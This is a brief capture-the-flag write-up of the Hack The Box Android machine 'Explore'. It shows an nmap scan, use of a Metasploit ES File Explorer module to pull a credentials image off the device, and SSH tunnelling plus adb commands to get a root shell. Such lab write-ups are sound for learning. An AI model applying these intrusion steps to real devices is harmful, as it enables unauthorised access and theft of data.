📦 HTB - Explore

0xNinja included in HTB

2021-07-29 282 words 2 minutes

Contents

Pretty interesting box, first time seeing Android in HTB.

TL;DR

Exfilter files on device using ES File explorer exploit, get user credentials. Root is straightforward with ADB.

Footholds

With nmap we get the following:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
# Nmap 7.91 scan initiated Wed Jul 28 14:49:28 2021 as: nmap -A -p- -o nmap.out explore.htb
Nmap scan report for explore.htb (10.10.10.247)
Host is up (0.043s latency).
Not shown: 65530 closed ports
PORT      STATE    SERVICE VERSION
2222/tcp  open     ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey: 
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp  filtered freeciv
33195/tcp open     unknown
[...]

2222: SSH server
5555: not interesting, we will see why further
33195: ES File Explorer (with some research)

The only useful port here is 33195, with a litle research on the web we get that this is possibly a good entrypoint for our exploit.

User

As this is an easy box ~~and I am lazy~~ I used the forbidden M e t a s p l o i t. Using it’s auxiliary/scanner/es_file_explorer_open_port exploit I managed to exfilter some files off the device:

We found some Pictures on the device. The creds.jpg is very interesting:

We can now ssh to the device and get user.txt.

Root

The idea that came to my mind here was to use ADB to get a root shell on the device. We first need to connect to this device with ADB, so we have to make a tunnel:

1
ssh -p 2222 user@explore.htb -L 5555:localhost:5555

We can now connect to it:

1
2
3
adb connect localhost:5555
adb root
adb shell

End of the box.